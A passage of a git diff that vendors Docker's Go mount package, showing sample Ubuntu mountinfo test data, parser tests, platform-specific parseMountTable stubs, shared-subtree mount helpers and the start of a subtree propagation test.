+139 15 0:3472 / /var/lib/docker/aufs/mnt/4390b872928c53500a5035634f3421622ed6299dc1472b631fc45de9f56dc180 rw,relatime - aufs none rw,si=9b4a76402f2fd39c
+140 15 0:3473 / /var/lib/docker/aufs/mnt/6bb41e78863b85e4aa7da89455314855c8c3bda64e52a583bab15dc1fa2e80c2 rw,relatime - aufs none rw,si=9b4a76402f2fa39c
+141 15 0:3474 / /var/lib/docker/aufs/mnt/4444f583c2a79c66608f4673a32c9c812154f027045fbd558c2d69920c53f835 rw,relatime - aufs none rw,si=9b4a764479dbd39c
+142 15 0:3475 / /var/lib/docker/aufs/mnt/6f11883af4a05ea362e0c54df89058da4859f977efd07b6f539e1f55c1d2a668 rw,relatime - aufs none rw,si=9b4a76402f30b39c
+143 15 0:3476 / /var/lib/docker/aufs/mnt/453490dd32e7c2e9ef906f995d8fb3c2753923d1a5e0ba3fd3296e2e4dc238e7 rw,relatime - aufs none rw,si=9b4a76402f30c39c
+144 15 0:3477 / /var/lib/docker/aufs/mnt/45e5945735ee102b5e891c91650c57ec4b52bb53017d68f02d50ea8a6e230610 rw,relatime - aufs none rw,si=9b4a76423260739c
+147 15 0:3480 / /var/lib/docker/aufs/mnt/4727a64a5553a1125f315b96bed10d3073d6988225a292cce732617c925b56ab rw,relatime - aufs none rw,si=9b4a76443030339c
+150 15 0:3483 / /var/lib/docker/aufs/mnt/4e348b5187b9a567059306afc72d42e0ec5c893b0d4abd547526d5f9b6fb4590 rw,relatime - aufs none rw,si=9b4a7644f5d8c39c
+151 15 0:3484 / /var/lib/docker/aufs/mnt/4efc616bfbc3f906718b052da22e4335f8e9f91ee9b15866ed3a8029645189ef rw,relatime - aufs none rw,si=9b4a7644f5d8939c
+152 15 0:3485 / /var/lib/docker/aufs/mnt/83e730ae9754d5adb853b64735472d98dfa17136b8812ac9cfcd1eba7f4e7d2d rw,relatime - aufs none rw,si=9b4a76469aa7139c
+153 15 0:3486 / /var/lib/docker/aufs/mnt/4fc5ba8a5b333be2b7eefacccb626772eeec0ae8a6975112b56c9fb36c0d342f rw,relatime - aufs none rw,si=9b4a7640128dc39c
+154 15 0:3487 / /var/lib/docker/aufs/mnt/50200d5edff5dfe8d1ef3c78b0bbd709793ac6e936aa16d74ff66f7ea577b6f9 rw,relatime - aufs none rw,si=9b4a7640128da39c
+155 15 0:3488 / /var/lib/docker/aufs/mnt/51e5e51604361448f0b9777f38329f414bc5ba9cf238f26d465ff479bd574b61 rw,relatime - aufs none rw,si=9b4a76444f68939c
+156 15 0:3489 / /var/lib/docker/aufs/mnt/52a142149aa98bba83df8766bbb1c629a97b9799944ead90dd206c4bdf0b8385 rw,relatime - aufs none rw,si=9b4a76444f68b39c
+157 15 0:3490 / /var/lib/docker/aufs/mnt/52dd21a94a00f58a1ed489312fcfffb91578089c76c5650364476f1d5de031bc rw,relatime - aufs none rw,si=9b4a76444f68f39c
+158 15 0:3491 / /var/lib/docker/aufs/mnt/ee562415ddaad353ed22c88d0ca768a0c74bfba6333b6e25c46849ee22d990da rw,relatime - aufs none rw,si=9b4a7640128d839c
+159 15 0:3492 / /var/lib/docker/aufs/mnt/db47a9e87173f7554f550c8a01891de79cf12acdd32e01f95c1a527a08bdfb2c rw,relatime - aufs none rw,si=9b4a764405a1d39c
+160 15 0:3493 / /var/lib/docker/aufs/mnt/55e827bf6d44d930ec0b827c98356eb8b68c3301e2d60d1429aa72e05b4c17df rw,relatime - aufs none rw,si=9b4a764405a1a39c
+162 15 0:3495 / /var/lib/docker/aufs/mnt/578dc4e0a87fc37ec081ca098430499a59639c09f6f12a8f48de29828a091aa6 rw,relatime - aufs none rw,si=9b4a76406d7d439c
+163 15 0:3496 / /var/lib/docker/aufs/mnt/728cc1cb04fa4bc6f7bf7a90980beda6d8fc0beb71630874c0747b994efb0798 rw,relatime - aufs none rw,si=9b4a76444f20e39c
+164 15 0:3497 / /var/lib/docker/aufs/mnt/5850cc4bd9b55aea46c7ad598f1785117607974084ea643580f58ce3222e683a rw,relatime - aufs none rw,si=9b4a7644a824239c
+165 15 0:3498 / /var/lib/docker/aufs/mnt/89443b3f766d5a37bc8b84e29da8b84e6a3ea8486d3cf154e2aae1816516e4a8 rw,relatime - aufs none rw,si=9b4a7644a824139c
+166 15 0:3499 / /var/lib/docker/aufs/mnt/f5ae8fd5a41a337907d16515bc3162525154b59c32314c695ecd092c3b47943d rw,relatime - aufs none rw,si=9b4a7644a824439c
+167 15 0:3500 / /var/lib/docker/aufs/mnt/5a430854f2a03a9e5f7cbc9f3fb46a8ebca526a5b3f435236d8295e5998798f5 rw,relatime - aufs none rw,si=9b4a7647fc82439c
+168 15 0:3501 / /var/lib/docker/aufs/mnt/eda16901ae4cead35070c39845cbf1e10bd6b8cb0ffa7879ae2d8a186e460f91 rw,relatime - aufs none rw,si=9b4a76441e0df39c
+169 15 0:3502 / /var/lib/docker/aufs/mnt/5a593721430c2a51b119ff86a7e06ea2b37e3b4131f8f1344d402b61b0c8d868 rw,relatime - aufs none rw,si=9b4a764248bad39c
+170 15 0:3503 / /var/lib/docker/aufs/mnt/d662ad0a30fbfa902e0962108685b9330597e1ee2abb16dc9462eb5a67fdd23f rw,relatime - aufs none rw,si=9b4a764248bae39c
+171 15 0:3504 / /var/lib/docker/aufs/mnt/5bc9de5c79812843fb36eee96bef1ddba812407861f572e33242f4ee10da2c15 rw,relatime - aufs none rw,si=9b4a764248ba839c
+172 15 0:3505 / /var/lib/docker/aufs/mnt/5e763de8e9b0f7d58d2e12a341e029ab4efb3b99788b175090d8209e971156c1 rw,relatime - aufs none rw,si=9b4a764248baa39c
+173 15 0:3506 / /var/lib/docker/aufs/mnt/b4431dc2739936f1df6387e337f5a0c99cf051900c896bd7fd46a870ce61c873 rw,relatime - aufs none rw,si=9b4a76401263539c
+174 15 0:3507 / /var/lib/docker/aufs/mnt/5f37830e5a02561ab8c67ea3113137ba69f67a60e41c05cb0e7a0edaa1925b24 rw,relatime - aufs none rw,si=9b4a76401263639c
+184 15 0:3508 / /var/lib/docker/aufs/mnt/62ea10b957e6533538a4633a1e1d678502f50ddcdd354b2ca275c54dd7a7793a rw,relatime - aufs none rw,si=9b4a76401263039c
+187 15 0:3509 / /var/lib/docker/aufs/mnt/d56ee9d44195fe390e042fda75ec15af5132adb6d5c69468fa8792f4e54a6953 rw,relatime - aufs none rw,si=9b4a76401263239c
+188 15 0:3510 / /var/lib/docker/aufs/mnt/6a300930673174549c2b62f36c933f0332a20735978c007c805a301f897146c5 rw,relatime - aufs none rw,si=9b4a76455d4c539c
+189 15 0:3511 / /var/lib/docker/aufs/mnt/64496c45c84d348c24d410015456d101601c30cab4d1998c395591caf7e57a70 rw,relatime - aufs none rw,si=9b4a76455d4c639c
+190 15 0:3512 / /var/lib/docker/aufs/mnt/65a6a645883fe97a7422cd5e71ebe0bc17c8e6302a5361edf52e89747387e908 rw,relatime - aufs none rw,si=9b4a76455d4c039c
+191 15 0:3513 / /var/lib/docker/aufs/mnt/672be40695f7b6e13b0a3ed9fc996c73727dede3481f58155950fcfad57ed616 rw,relatime - aufs none rw,si=9b4a76455d4c239c
+192 15 0:3514 / /var/lib/docker/aufs/mnt/d42438acb2bfb2169e1c0d8e917fc824f7c85d336dadb0b0af36dfe0f001b3ba rw,relatime - aufs none rw,si=9b4a7642bfded39c
+193 15 0:3515 / /var/lib/docker/aufs/mnt/b48a54abf26d01cb2ddd908b1ed6034d17397c1341bf0eb2b251a3e5b79be854 rw,relatime - aufs none rw,si=9b4a7642bfdee39c
+194 15 0:3516 / /var/lib/docker/aufs/mnt/76f27134491f052bfb87f59092126e53ef875d6851990e59195a9da16a9412f8 rw,relatime - aufs none rw,si=9b4a7642bfde839c
+195 15 0:3517 / /var/lib/docker/aufs/mnt/6bd626a5462b4f8a8e1cc7d10351326dca97a59b2758e5ea549a4f6350ce8a90 rw,relatime - aufs none rw,si=9b4a7642bfdea39c
+196 15 0:3518 / /var/lib/docker/aufs/mnt/f1fe3549dbd6f5ca615e9139d9b53f0c83a3b825565df37628eacc13e70cbd6d rw,relatime - aufs none rw,si=9b4a7642bfdf539c
+197 15 0:3519 / /var/lib/docker/aufs/mnt/6d0458c8426a9e93d58d0625737e6122e725c9408488ed9e3e649a9984e15c34 rw,relatime - aufs none rw,si=9b4a7642bfdf639c
+198 15 0:3520 / /var/lib/docker/aufs/mnt/6e4c97db83aa82145c9cf2bafc20d500c0b5389643b689e3ae84188c270a48c5 rw,relatime - aufs none rw,si=9b4a7642bfdf039c
+199 15 0:3521 / /var/lib/docker/aufs/mnt/eb94d6498f2c5969eaa9fa11ac2934f1ab90ef88e2d002258dca08e5ba74ea27 rw,relatime - aufs none rw,si=9b4a7642bfdf239c
+200 15 0:3522 / /var/lib/docker/aufs/mnt/fe3f88f0c511608a2eec5f13a98703aa16e55dbf930309723d8a37101f539fe1 rw,relatime - aufs none rw,si=9b4a7642bfc3539c
+201 15 0:3523 / /var/lib/docker/aufs/mnt/6f40c229fb9cad85fabf4b64a2640a5403ec03fe5ac1a57d0609fb8b606b9c83 rw,relatime - aufs none rw,si=9b4a7642bfc3639c
+202 15 0:3524 / /var/lib/docker/aufs/mnt/7513e9131f7a8acf58ff15248237feb767c78732ca46e159f4d791e6ef031dbc rw,relatime - aufs none rw,si=9b4a7642bfc3039c
+203 15 0:3525 / /var/lib/docker/aufs/mnt/79f48b00aa713cdf809c6bb7c7cb911b66e9a8076c81d6c9d2504139984ea2da rw,relatime - aufs none rw,si=9b4a7642bfc3239c
+204 15 0:3526 / /var/lib/docker/aufs/mnt/c3680418350d11358f0a96c676bc5aa74fa00a7c89e629ef5909d3557b060300 rw,relatime - aufs none rw,si=9b4a7642f47cd39c
+205 15 0:3527 / /var/lib/docker/aufs/mnt/7a1744dd350d7fcc0cccb6f1757ca4cbe5453f203a5888b0f1014d96ad5a5ef9 rw,relatime - aufs none rw,si=9b4a7642f47ce39c
+206 15 0:3528 / /var/lib/docker/aufs/mnt/7fa99662db046be9f03c33c35251afda9ccdc0085636bbba1d90592cec3ff68d rw,relatime - aufs none rw,si=9b4a7642f47c839c
+207 15 0:3529 / /var/lib/docker/aufs/mnt/f815021ef20da9c9b056bd1d52d8aaf6e2c0c19f11122fc793eb2b04eb995e35 rw,relatime - aufs none rw,si=9b4a7642f47ca39c
+208 15 0:3530 / /var/lib/docker/aufs/mnt/801086ae3110192d601dfcebdba2db92e86ce6b6a9dba6678ea04488e4513669 rw,relatime - aufs none rw,si=9b4a7642dc6dd39c
+209 15 0:3531 / /var/lib/docker/aufs/mnt/822ba7db69f21daddda87c01cfbfbf73013fc03a879daf96d16cdde6f9b1fbd6 rw,relatime - aufs none rw,si=9b4a7642dc6de39c
+210 15 0:3532 / /var/lib/docker/aufs/mnt/834227c1a950fef8cae3827489129d0dd220541e60c6b731caaa765bf2e6a199 rw,relatime - aufs none rw,si=9b4a7642dc6d839c
+211 15 0:3533 / /var/lib/docker/aufs/mnt/83dccbc385299bd1c7cf19326e791b33a544eea7b4cdfb6db70ea94eed4389fb rw,relatime - aufs none rw,si=9b4a7642dc6da39c
+212 15 0:3534 / /var/lib/docker/aufs/mnt/f1b8e6f0e7c8928b5dcdab944db89306ebcae3e0b32f9ff40d2daa8329f21600 rw,relatime - aufs none rw,si=9b4a7645a126039c
+213 15 0:3535 / /var/lib/docker/aufs/mnt/970efb262c7a020c2404cbcc5b3259efba0d110a786079faeef05bc2952abf3a rw,relatime - aufs none rw,si=9b4a7644c8ed139c
+214 15 0:3536 / /var/lib/docker/aufs/mnt/84b6d73af7450f3117a77e15a5ca1255871fea6182cd8e8a7be6bc744be18c2c rw,relatime - aufs none rw,si=9b4a76406559139c
+215 15 0:3537 / /var/lib/docker/aufs/mnt/88be2716e026bc681b5e63fe7942068773efbd0b6e901ca7ba441412006a96b6 rw,relatime - aufs none rw,si=9b4a76406559339c
+216 15 0:3538 / /var/lib/docker/aufs/mnt/c81939aa166ce50cd8bca5cfbbcc420a78e0318dd5cd7c755209b9166a00a752 rw,relatime - aufs none rw,si=9b4a76406559239c
+217 15 0:3539 / /var/lib/docker/aufs/mnt/e0f241645d64b7dc5ff6a8414087cca226be08fb54ce987d1d1f6350c57083aa rw,relatime - aufs none rw,si=9b4a7647cfc0f39c
+218 15 0:3540 / /var/lib/docker/aufs/mnt/e10e2bf75234ed51d8a6a4bb39e465404fecbe318e54400d3879cdb2b0679c78 rw,relatime - aufs none rw,si=9b4a7647cfc0939c
+219 15 0:3541 / /var/lib/docker/aufs/mnt/8f71d74c8cfc3228b82564aa9f09b2e576cff0083ddfb6aa5cb350346063f080 rw,relatime - aufs none rw,si=9b4a7647cfc0a39c
+220 15 0:3542 / /var/lib/docker/aufs/mnt/9159f1eba2aef7f5205cc18d015cda7f5933cd29bba3b1b8aed5ccb5824c69ee rw,relatime - aufs none rw,si=9b4a76468cedd39c
+221 15 0:3543 / /var/lib/docker/aufs/mnt/932cad71e652e048e500d9fbb5b8ea4fc9a269d42a3134ce527ceef42a2be56b rw,relatime - aufs none rw,si=9b4a76468cede39c
+222 15 0:3544 / /var/lib/docker/aufs/mnt/bf1e1b5f529e8943cc0144ee86dbaaa37885c1ddffcef29537e0078ee7dd316a rw,relatime - aufs none rw,si=9b4a76468ced839c
+223 15 0:3545 / /var/lib/docker/aufs/mnt/949d93ecf3322e09f858ce81d5f4b434068ec44ff84c375de03104f7b45ee955 rw,relatime - aufs none rw,si=9b4a76468ceda39c
+224 15 0:3546 / /var/lib/docker/aufs/mnt/d65c6087f92dc2a3841b5251d2fe9ca07d4c6e5b021597692479740816e4e2a1 rw,relatime - aufs none rw,si=9b4a7645a126239c
+225 15 0:3547 / /var/lib/docker/aufs/mnt/98a0153119d0651c193d053d254f6e16a68345a141baa80c87ae487e9d33f290 rw,relatime - aufs none rw,si=9b4a7640787cf39c
+226 15 0:3548 / /var/lib/docker/aufs/mnt/99daf7fe5847c017392f6e59aa9706b3dfdd9e6d1ba11dae0f7fffde0a60b5e5 rw,relatime - aufs none rw,si=9b4a7640787c839c
+227 15 0:3549 / /var/lib/docker/aufs/mnt/9ad1f2fe8a5599d4e10c5a6effa7f03d932d4e92ee13149031a372087a359079 rw,relatime - aufs none rw,si=9b4a7640787ca39c
+228 15 0:3550 / /var/lib/docker/aufs/mnt/c26d64494da782ddac26f8370d86ac93e7c1666d88a7b99110fc86b35ea6a85d rw,relatime - aufs none rw,si=9b4a7642fc6b539c
+229 15 0:3551 / /var/lib/docker/aufs/mnt/a49e4a8275133c230ec640997f35f172312eb0ea5bd2bbe10abf34aae98f30eb rw,relatime - aufs none rw,si=9b4a7642fc6b639c
+230 15 0:3552 / /var/lib/docker/aufs/mnt/b5e2740c867ed843025f49d84e8d769de9e8e6039b3c8cb0735b5bf358994bc7 rw,relatime - aufs none rw,si=9b4a7642fc6b039c
+231 15 0:3553 / /var/lib/docker/aufs/mnt/a826fdcf3a7039b30570054579b65763db605a314275d7aef31b872c13311b4b rw,relatime - aufs none rw,si=9b4a7642fc6b239c
+232 15 0:3554 / /var/lib/docker/aufs/mnt/addf3025babf5e43b5a3f4a0da7ad863dda3c01fb8365c58fd8d28bb61dc11bc rw,relatime - aufs none rw,si=9b4a76407871d39c
+233 15 0:3555 / /var/lib/docker/aufs/mnt/c5b6c6813ab3e5ebdc6d22cb2a3d3106a62095f2c298be52b07a3b0fa20ff690 rw,relatime - aufs none rw,si=9b4a76407871e39c
+234 15 0:3556 / /var/lib/docker/aufs/mnt/af0609eaaf64e2392060cb46f5a9f3d681a219bb4c651d4f015bf573fbe6c4cf rw,relatime - aufs none rw,si=9b4a76407871839c
+235 15 0:3557 / /var/lib/docker/aufs/mnt/e7f20e3c37ecad39cd90a97cd3549466d0d106ce4f0a930b8495442634fa4a1f rw,relatime - aufs none rw,si=9b4a76407871a39c
+237 15 0:3559 / /var/lib/docker/aufs/mnt/b57a53d440ffd0c1295804fa68cdde35d2fed5409484627e71b9c37e4249fd5c rw,relatime - aufs none rw,si=9b4a76444445a39c
+238 15 0:3560 / /var/lib/docker/aufs/mnt/b5e7d7b8f35e47efbba3d80c5d722f5e7bd43e54c824e54b4a4b351714d36d42 rw,relatime - aufs none rw,si=9b4a7647932d439c
+239 15 0:3561 / /var/lib/docker/aufs/mnt/f1b136def157e9465640658f277f3347de593c6ae76412a2e79f7002f091cae2 rw,relatime - aufs none rw,si=9b4a76445abcd39c
+240 15 0:3562 / /var/lib/docker/aufs/mnt/b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc rw,relatime - aufs none rw,si=9b4a7644403b339c
+241 15 0:3563 / /var/lib/docker/aufs/mnt/b89b140cdbc95063761864e0a23346207fa27ee4c5c63a1ae85c9069a9d9cf1d rw,relatime - aufs none rw,si=9b4a7644aa19739c
+242 15 0:3564 / /var/lib/docker/aufs/mnt/bc6a69ed51c07f5228f6b4f161c892e6a949c0e7e86a9c3432049d4c0e5cd298 rw,relatime - aufs none rw,si=9b4a7644aa19139c
+243 15 0:3565 / /var/lib/docker/aufs/mnt/be4e2ba3f136933e239f7cf3d136f484fb9004f1fbdfee24a62a2c7b0ab30670 rw,relatime - aufs none rw,si=9b4a7644aa19339c
+244 15 0:3566 / /var/lib/docker/aufs/mnt/e04ca1a4a5171e30d20f0c92f90a50b8b6f8600af5459c4b4fb25e42e864dfe1 rw,relatime - aufs none rw,si=9b4a7647932d139c
+245 15 0:3567 / /var/lib/docker/aufs/mnt/be61576b31db893129aaffcd3dcb5ce35e49c4b71b30c392a78609a45c7323d8 rw,relatime - aufs none rw,si=9b4a7642d85f739c
+246 15 0:3568 / /var/lib/docker/aufs/mnt/dda42c191e56becf672327658ab84fcb563322db3764b91c2fefe4aaef04c624 rw,relatime - aufs none rw,si=9b4a7642d85f139c
+247 15 0:3569 / /var/lib/docker/aufs/mnt/c0a7995053330f3d88969247a2e72b07e2dd692133f5668a4a35ea3905561072 rw,relatime - aufs none rw,si=9b4a7642d85f339c
+249 15 0:3571 / /var/lib/docker/aufs/mnt/c3594b2e5f08c59ff5ed338a1ba1eceeeb1f7fc5d180068338110c00b1eb8502 rw,relatime - aufs none rw,si=9b4a7642738c739c
+250 15 0:3572 / /var/lib/docker/aufs/mnt/c58dce03a0ab0a7588393880379dc3bce9f96ec08ed3f99cf1555260ff0031e8 rw,relatime - aufs none rw,si=9b4a7642738c139c
+251 15 0:3573 / /var/lib/docker/aufs/mnt/c73e9f1d109c9d14cb36e1c7489df85649be3911116d76c2fd3648ec8fd94e23 rw,relatime - aufs none rw,si=9b4a7642738c339c
+252 15 0:3574 / /var/lib/docker/aufs/mnt/c9eef28c344877cd68aa09e543c0710ab2b305a0ff96dbb859bfa7808c3e8d01 rw,relatime - aufs none rw,si=9b4a7642d85f439c
+253 15 0:3575 / /var/lib/docker/aufs/mnt/feb67148f548d70cb7484f2aaad2a86051cd6867a561741a2f13b552457d666e rw,relatime - aufs none rw,si=9b4a76468c55739c
+254 15 0:3576 / /var/lib/docker/aufs/mnt/cdf1f96c36d35a96041a896bf398ec0f7dc3b0fb0643612a0f4b6ff96e04e1bb rw,relatime - aufs none rw,si=9b4a76468c55139c
+255 15 0:3577 / /var/lib/docker/aufs/mnt/ec6e505872353268451ac4bc034c1df00f3bae4a3ea2261c6e48f7bd5417c1b3 rw,relatime - aufs none rw,si=9b4a76468c55339c
+256 15 0:3578 / /var/lib/docker/aufs/mnt/d6dc8aca64efd90e0bc10274001882d0efb310d42ccbf5712b99b169053b8b1a rw,relatime - aufs none rw,si=9b4a7642738c439c
+257 15 0:3579 / /var/lib/docker/aufs/mnt/d712594e2ff6eaeb895bfd150d694bd1305fb927e7a186b2dab7df2ea95f8f81 rw,relatime - aufs none rw,si=9b4a76401268f39c
+259 15 0:3581 / /var/lib/docker/aufs/mnt/dbfa1174cd78cde2d7410eae442af0b416c4a0e6f87ed4ff1e9f169a0029abc0 rw,relatime - aufs none rw,si=9b4a76401268b39c
+260 15 0:3582 / /var/lib/docker/aufs/mnt/e883f5a82316d7856fbe93ee8c0af5a920b7079619dd95c4ffd88bbd309d28dd rw,relatime - aufs none rw,si=9b4a76468c55439c
+261 15 0:3583 / /var/lib/docker/aufs/mnt/fdec3eff581c4fc2b09f87befa2fa021f3f2d373bea636a87f1fb5b367d6347a rw,relatime - aufs none rw,si=9b4a7644aa1af39c
+262 15 0:3584 / /var/lib/docker/aufs/mnt/ef764e26712184653067ecf7afea18a80854c41331ca0f0ef03e1bacf90a6ffc rw,relatime - aufs none rw,si=9b4a7644aa1a939c
+263 15 0:3585 / /var/lib/docker/aufs/mnt/f3176b40c41fce8ce6942936359a2001a6f1b5c1bb40ee224186db0789ec2f76 rw,relatime - aufs none rw,si=9b4a7644aa1ab39c
+264 15 0:3586 / /var/lib/docker/aufs/mnt/f5daf06785d3565c6dd18ea7d953d9a8b9606107781e63270fe0514508736e6a rw,relatime - aufs none rw,si=9b4a76401268c39c
+58 15 0:3587 / /var/lib/docker/aufs/mnt/cde8c40f6524b7361af4f5ad05bb857dc9ee247c20852ba666195c0739e3a2b8-init rw,relatime - aufs none rw,si=9b4a76444445839c
+67 15 0:3588 / /var/lib/docker/aufs/mnt/cde8c40f6524b7361af4f5ad05bb857dc9ee247c20852ba666195c0739e3a2b8 rw,relatime - aufs none rw,si=9b4a7644badd339c
+265 15 0:3610 / /var/lib/docker/aufs/mnt/e812472cd2c8c4748d1ef71fac4e77e50d661b9349abe66ce3e23511ed44f414 rw,relatime - aufs none rw,si=9b4a76427937d39c
+270 15 0:3615 / /var/lib/docker/aufs/mnt/997636e7c5c9d0d1376a217e295c14c205350b62bc12052804fb5f90abe6f183 rw,relatime - aufs none rw,si=9b4a76406540739c
+273 15 0:3618 / /var/lib/docker/aufs/mnt/d5794d080417b6e52e69227c3873e0e4c1ff0d5a845ebe3860ec2f89a47a2a1e rw,relatime - aufs none rw,si=9b4a76454814039c
+278 15 0:3623 / /var/lib/docker/aufs/mnt/586bdd48baced671bb19bc4d294ec325f26c55545ae267db426424f157d59c48 rw,relatime - aufs none rw,si=9b4a7644b439f39c
+281 15 0:3626 / /var/lib/docker/aufs/mnt/69739d022f89f8586908bbd5edbbdd95ea5256356f177f9ffcc6ef9c0ea752d2 rw,relatime - aufs none rw,si=9b4a7644a0f1b39c
+286 15 0:3631 / /var/lib/docker/aufs/mnt/ff28c27d5f894363993622de26d5dd352dba072f219e4691d6498c19bbbc15a9 rw,relatime - aufs none rw,si=9b4a7642265b339c
+289 15 0:3634 / /var/lib/docker/aufs/mnt/aa128fe0e64fdede333aa48fd9de39530c91a9244a0f0649a3c411c61e372daa rw,relatime - aufs none rw,si=9b4a764012ada39c
+99 15 8:33 / /media/REMOVE\040ME rw,nosuid,nodev,relatime - fuseblk /dev/sdc1 rw,user_id=0,group_id=0,allow_other,blksize=4096`
+)
+
+func TestParseFedoraMountinfo(t *testing.T) {
+	r := bytes.NewBuffer([]byte(fedoraMountinfo))
+	_, err := parseInfoFile(r)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestParseUbuntuMountinfo(t *testing.T) {
+	r := bytes.NewBuffer([]byte(ubuntuMountInfo))
+	_, err := parseInfoFile(r)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestParseGentooMountinfo(t *testing.T) {
+	r := bytes.NewBuffer([]byte(gentooMountinfo))
+	_, err := parseInfoFile(r)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestParseFedoraMountinfoFields(t *testing.T) {
+	r := bytes.NewBuffer([]byte(fedoraMountinfo))
+	infos, err := parseInfoFile(r)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expectedLength := 58
+	if len(infos) != expectedLength {
+		t.Fatalf("Expected %d entries, got %d", expectedLength, len(infos))
+	}
+	mi := Info{
+		ID:         15,
+		Parent:     35,
+		Major:      0,
+		Minor:      3,
+		Root:       "/",
+		Mountpoint: "/proc",
+		Opts:       "rw,nosuid,nodev,noexec,relatime",
+		Optional:   "shared:5",
+		Fstype:     "proc",
+		Source:     "proc",
+		VfsOpts:    "rw",
+	}
+
+	if *infos[0] != mi {
+		t.Fatalf("expected %#v, got %#v", mi, infos[0])
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
new file mode 100644
index 0000000000..ad9ab57f8b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go
@@ -0,0 +1,37 @@
+// +build solaris,cgo
+
+package mount
+
+/*
+#include <stdio.h>
+#include <sys/mnttab.h>
+*/
+import "C"
+
+import (
+	"fmt"
+)
+
+func parseMountTable() ([]*Info, error) {
+	mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r"))
+	if mnttab == nil {
+		return nil, fmt.Errorf("Failed to open %s", C.MNTTAB)
+	}
+
+	var out []*Info
+	var mp C.struct_mnttab
+
+	ret := C.getmntent(mnttab, &mp)
+	for ret == 0 {
+		var mountinfo Info
+		mountinfo.Mountpoint = C.GoString(mp.mnt_mountp)
+		mountinfo.Source = C.GoString(mp.mnt_special)
+		mountinfo.Fstype = C.GoString(mp.mnt_fstype)
+		mountinfo.Opts = C.GoString(mp.mnt_mntopts)
+		out = append(out, &mountinfo)
+		ret = C.getmntent(mnttab, &mp)
+	}
+
+	C.fclose(mnttab)
+	return out, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
new file mode 100644
index 0000000000..7fbcf19214
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go
@@ -0,0 +1,12 @@
+// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo
+
+package mount
+
+import (
+	"fmt"
+	"runtime"
+)
+
+func parseMountTable() ([]*Info, error) {
+	return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH)
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
new file mode 100644
index 0000000000..dab8a37ed0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go
@@ -0,0 +1,6 @@
+package mount
+
+func parseMountTable() ([]*Info, error) {
+	// Do NOT return an error!
+	return nil, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
new file mode 100644
index 0000000000..8ceec84bc6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go
@@ -0,0 +1,69 @@
+// +build linux
+
+package mount
+
+// MakeShared ensures a mounted filesystem has the SHARED mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeShared(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "shared")
+}
+
+// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeRShared(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rshared")
+}
+
+// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakePrivate(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "private")
+}
+
+// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option
+// enabled. See the supported options in flags.go for further reference.
+func MakeRPrivate(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rprivate")
+}
+
+// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeSlave(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "slave")
+}
+
+// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled.
+// See the supported options in flags.go for further reference.
+func MakeRSlave(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "rslave")
+}
+
+// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option
+// enabled. See the supported options in flags.go for further reference.
+func MakeUnbindable(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "unbindable")
+}
+
+// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount
+// option enabled. See the supported options in flags.go for further reference.
+func MakeRUnbindable(mountPoint string) error {
+	return ensureMountedAs(mountPoint, "runbindable")
+}
+
+func ensureMountedAs(mountPoint, options string) error {
+	mounted, err := Mounted(mountPoint)
+	if err != nil {
+		return err
+	}
+
+	if !mounted {
+		if err := Mount(mountPoint, mountPoint, "none", "bind,rw"); err != nil {
+			return err
+		}
+	}
+	if _, err = Mounted(mountPoint); err != nil {
+		return err
+	}
+
+	return ForceMount("", mountPoint, "none", options)
+}
diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
new file mode 100644
index 0000000000..c1837942e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go
@@ -0,0 +1,331 @@
+// +build linux
+
+package mount
+
+import (
+	"os"
+	"path"
+	"syscall"
+	"testing"
+)
+
+// nothing is propagated in or out
+func TestSubtreePrivate(t *testing.T) {
+	tmp := path.Join(os.TempDir(), "mount-tests")
+	if err := os.MkdirAll(tmp, 0777); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	var (
+		sourceDir   = path.Join(tmp, "source")
+		targetDir   = path.Join(tmp, "target")
+		outside1Dir = path.Join(tmp, "outside1")
+		outside2Dir = path.Join(tmp, "outside2")
+
+		outside1Path      = path.Join(outside1Dir, "file.txt")
